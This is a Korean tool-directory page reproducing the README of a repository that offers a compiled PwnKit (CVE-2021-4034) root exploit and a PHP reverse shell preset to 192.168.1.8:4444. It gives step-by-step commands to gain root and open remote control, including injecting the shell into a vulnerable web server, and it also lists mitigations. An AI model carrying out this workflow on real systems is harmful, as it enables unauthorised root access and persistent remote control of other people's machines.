Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
hack — CVE-2021-4034 (PwnKit) 취약점에 대한 개념 증명(PoC)과 Linux 환경에서의 권한 상승 및 원격 실행 시연을 위한 스크립팅 유틸리티가 포함된 보안 연구 저장소입니다. | Kitploit
도구/GitHubGitHub/jscamposx/hack
Privilege EscalationVulnerability AnalysisExploitationLearning & EducationRemote Access ToolPayload Development
GitHubjscamposx/hack

hack

CVE-2021-4034 (PwnKit) 취약점에 대한 개념 증명(PoC)과 Linux 환경에서의 권한 상승 및 원격 실행 시연을 위한 스크립팅 유틸리티가 포함된 보안 연구 저장소입니다.

저장소 보기
169개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

💀 PwnKit (CVE-2021-4034) 및 리버스 셸 툴킷

Security Research CVE Language

⚠️ 면책 조항: 이 저장소는 교육 및 보안 연구 목적으로만 생성되었습니다. 저자는 이 도구의 오용에 대해 책임을 지지 않습니다. 통제된 환경이나 명시적 허가를 받은 곳에서만 사용하십시오.


📜 설명

이 저장소는 Polkit의 pkexec 구성 요소에 있는 로컬 권한 상승의 심각한 취약점인 PwnKit(CVE-2021-4034)에 대한 컴파일된 개념 증명(PoC)을 포함합니다.

또한 익스플로잇 후 또는 초기 접근 벡터로 배포할 수 있는 PHP 리버스 셸 스크립트가 포함되어 있습니다.

🎯 목표

취약한 Linux 시스템에서 root 접근 권한을 획득하고 리버스 셸을 통해 지속성 또는 원격 제어를 설정합니다.


📂 무기고 내용

1. PwnKit (ELF 바이너리)

CVE-2021-4034용으로 컴파일된 익스플로잇입니다.

  • 기능: pkexec의 환경 변수를 조작하여 악성 공유 라이브러리를 로드하고 root 권한으로 코드를 실행합니다.
  • 아키텍처: x86_64 (Linux).
  • 의존성: 대상 시스템에 pkexec가 설치되어 있어야 합니다.

2. reverseShell.php

리버스 연결을 설정하기 위한 경량 페이로드입니다.

  • 현재 설정:
    • IP: 192.168.1.8
    • 포트: 4444
    • 셸: /bin/bash
  • 사용법: CLI(php reverseShell.php)를 통해 실행하거나 취약한 웹 서버에 주입할 수 있습니다.

🚀 사용 가이드

1단계: 권한 상승 (PwnKit)

  1. PwnKit 바이너리를 대상 시스템에 전송합니다.
  2. 실행 권한을 부여합니다:
    root@kitploit:~
    chmod +x PwnKit
    
  3. 익스플로잇을 실행합니다:
    root@kitploit:~
    ./PwnKit
    
    성공하면 즉시 root 권한의 셸을 얻을 수 있습니다.

2단계: 원격 연결 (리버스 셸)

  1. 공격자 시스템에서 Netcat 리스너를 시작합니다:
    root@kitploit:~
    nc -lvnp 4444
    
  2. IP가 기본 설정과 다르면 reverseShell.php를 편집합니다.
  3. 대상 시스템에서 스크립트를 실행합니다 (일반 사용자 또는 PwnKit 사용 후 root 권한):
    root@kitploit:~
    php reverseShell.php
    

🛠️ 기술 세부 사항 (CVE-2021-4034)

이 취약점은 pkexec가 명령줄 인수를 처리하는 방식에 있습니다. 빈 인수 목록을 전달하면 pkexec가 범위를 벗어난 argv[1]에 접근하려고 시도하며, 공격자가 메모리의 환경 변수를 덮어쓸 수 있게 됩니다. 특히 악성 GCONV_PATH 변수를 주입하여 실행 흐름을 가로챕니다.

  • 공개일: 2022년 1월.
  • 영향: 대부분의 기본 Linux 배포판(Ubuntu, Debian, Fedora, CentOS)에서 즉각적인 root 접근.

🛡️ 완화

이 익스플로잇으로부터 보호하려면:

  1. Polkit 업데이트: 배포판에서 제공하는 보안 패치를 설치합니다.
  2. SUID 비트 제거 (임시 해결책):
    root@kitploit:~
    chmod 0755 /usr/bin/pkexec
    

Happy Hacking! 🏴‍☠️

도구 다운로드